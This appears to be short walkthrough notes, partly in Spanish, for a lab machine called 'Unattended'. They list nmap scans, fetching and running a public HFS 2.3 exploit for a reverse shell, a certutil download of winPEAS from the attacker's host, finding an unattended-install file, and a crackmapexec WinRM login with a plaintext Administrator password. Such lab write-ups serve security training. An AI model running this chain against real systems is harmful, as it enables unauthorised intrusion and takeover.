Unattended

nmap -A -p- -oA output 172.31.1.24 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -p- -sS —min-rate=5000 —open -vvv -n -Pn 172.31.1.24 -oG allPorts

extractPorts allPorts

nmap -sC -sV -p80,135,139,445,3389,5985,47001 172.31.1.24 -oN targeted

nmap —script http-enum -p80 172.31.1.24 -oN webScan

whatweb 172.31.1.24:80

cat targeted

Buscamos HFS 2.3 en searchsploit

searchsploit HFS 2.3

searchsploit -m 49584.py

Cambiamos los puertos y las ips de lhost y rhost

python3 49584.py

Obtenemos un reverse shell

python3 -m http.server 8888

certutil -urlcache -split -f “http://10.10.0.12:8888/winPEASany.exe” winPEASany.exe”

.\winPEASEany.exe

whoami

syteminfo

whoami /priv

cd C:\Windows\Panther

file Unattended.xml

crackmapexec winrm 172.31.1.24 -u Administrator -p ‘cnt4weRAbtXMTSVV’ -x ‘whoami’